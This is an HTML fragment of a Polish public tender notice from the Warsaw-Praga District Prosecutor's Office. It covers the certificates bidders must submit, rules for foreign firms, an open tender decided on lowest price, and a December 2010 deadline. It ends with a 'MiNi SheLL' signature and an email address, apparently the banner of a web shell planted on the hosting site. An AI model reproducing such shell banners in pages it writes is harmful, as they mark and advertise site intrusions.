<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oryginał bądź notarialnie potwierdzona kopia pełnomocnictwa do reprezentowania Wykonawcy (a w przypadku podmiotów występujących wspólnie - do reprezentowania Wykonawców) w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w trakcie jej trwania z uwagi na urzędową zmianę stawki VAT na przedmiot umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warszawapraga.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PROKURATURA OKRĘGOWA WARSZAWA-PRAGA W WARSZAWIE
ul. Bródnowska 13/15  
03-439 Warszawa 
pokój 219, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2010 godzina 12:00, miejsce: PROKURATURA OKRĘGOWA WARSZAWA-PRAGA W WARSZAWIE
ul. Bródnowska 13/15  
03-439 Warszawa 
pokój 201, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com